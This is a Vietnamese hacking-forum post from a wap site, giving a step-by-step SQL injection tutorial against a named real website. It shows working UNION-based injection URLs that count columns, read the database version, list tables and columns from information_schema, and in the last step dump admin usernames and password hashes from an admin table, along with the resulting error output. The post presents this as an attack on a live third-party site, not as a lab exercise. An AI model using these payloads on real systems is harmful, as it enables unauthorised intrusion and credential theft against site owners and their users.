↓↓xuống cuối trang↓↓
Chào mừng bạn đến với wap DinhLoi.XtGem.Com | Chúc bạn có 1 năm mới vui vẻ tốt lành hạnh phúc! Hãy giới thiệu website này cho bạn bè nhé!img
DinhLoi.XtGem.Com =>> CaFe9x.Gq
Bạn đến từ quốc gia:


Hôm nay ngày
08.05.26/15:35
img- Hi. Xin chào! Mozilla/5.0
logo
.
HOMECHÁTTruyệnFORUM
logo

Chatbox|Admin nhận làm wap/web, giá cả thương lượng... Thông tin admin tại mỗi bài viết.
Home · Bang hội ·
* Đăng Nhập hoặc Đăng Kí để sử dụng hết chức năng của diễn đàn.
Hi, Khách!
HomeBang hội » Wapmaster » Hacking » » Xem bài viết
Tìm kiếm
Xuống dưới »
avatar by Pham_loi Pham_loi
Chức vụ:
00:28:52, 18-02-2016
Basic
Để test site lổi các bạn có thể dùng dấu '
Ví dụ : http://www.site.com/news.php?id=5'
Ở đây mình sẽ test site này
http://www.tartanarmy.com/news/news.php?id=130'
site đã dính
img
PHP Code:
PHP Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in D:Domainstartanarmy.comwwwrootnewsnews.php on line 19 PHP Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in D:Domainstartanarmy.comwwwrootnewsnews.php on line 25
Copy code


Tiếp theo các bạn có thể dùng tools get or get bằng tay ^^
Bắt đầu nào ^^:
Bạn phải tìm xem có bao nhiêu columns trong site
PHP Code:
http://www.tartanarmy.com/news/news.php?id=130 order by 3
Copy code

Luôn luôn bắt đầu bằng 3 vì một site luôn có 3 cột
---> ở trang này mình test luôn đến 10
PHP Code:
http://www.tartanarmy.com/news/news.php?id=130 order by 10
Copy code


img
^^như vậy là ít hơn 10 cột
Hãy thử để tìm ra cột
ở đây mình test 6. điều quan trọng là các bạn phải tìm ra cột nào Lỗi
PHP Code:
http://www.tartanarmy.com/news/news.php?id=-130 UNION SELECT 1,2,3,4,5,6
Copy code

Chú ý cái dấu màu đỏ ( - ) điều này rất quan trọng nó sẽ liên kết với vế sau
img
Nhìn vào đó các bạn thấy cột 2-4-5 rất dể bi lổi .chú ý khai thác
----?> H chúng ta tìm phiên bản PHP nhé
PHP Code:
http://www.tartanarmy.com/news/news.php?id=-130 UNION SELECT 1,2,3,4,@@version,6
Copy code

img
Có thấy hình không chắc không cần nói vision mấy chứ
^^
^^
H các bạn làm sao thấy các table name nhìn bên dưới đi ^^
PHP Code:
http://www.tartanarmy.com/news/news.php?id=-130 UNION SELECT 1,2,3,4,group_concat(table_name),6  from information_schema.tables where table_schema= database ()
Copy code


img
Các bạn thấy tar_admin hãy tìm info thông tin trong đó
PHP Code:
http://www.tartanarmy.com/news/news.php?id=-130 UNION SELECT 1,2,3,4,group_concat(column_name),6  from information_schema.columns where table_name= tar_admin
Copy code


Nhưng làm sao các pro có thể thay đổi info thì hãy tải cái
đầu tiên mình đã nói
Hãy chuyển đổi thành char() vào MySQL, sau đó MYSQL CHAR ().
HackBar [FireFox

PHP Code:
tar_admin = CHAR(116, 97, 114, 95, 97, 100, 109, 105, 110)
Copy code

Toàn bộ sẽ là
PHP Code:
http://www.tartanarmy.com/news/news.php?id=-130 UNION SELECT 1,2,3,4,group_concat(column_name),6  from information_schema.columns where table_name= CHAR(116, 97, 114, 95, 97, 100, 109, 105, 110)
Copy code

[img
Chúng ta đang tìm pass admin ^^
hãy nhìn img
img
Chúng ta đã thấy được j rồi ^^
Tiến hành view pass thui
PHP Code:
http://www.tartanarmy.com/news/news.php?id=-130 UNION SELECT 1,2,3,4,group_concat(username,0x3a,password),6 from tar_admin
Copy code


img
Like: 0
Trực Tuyến: Khách: 1
Online: 1/52
Thành viên: 154
Diễn đàn teen Việt Nam
CopyRight 2014
Tag:
Bạn đến từ:
Share: img img img img img
Gọi admin | SMS admin
Facebook:Nhox Attend

Thanks To:XtGem
Liên kết:
Tool tiện ích admin,KhoGame360,Blog thủ thuật,kenh380
,truyen23h
,tai hinh nen naruto,kenhpro - wap hay,vmt - wap hay, Trần Phú Hiền Blog
U-ON

XtGem Forum catalog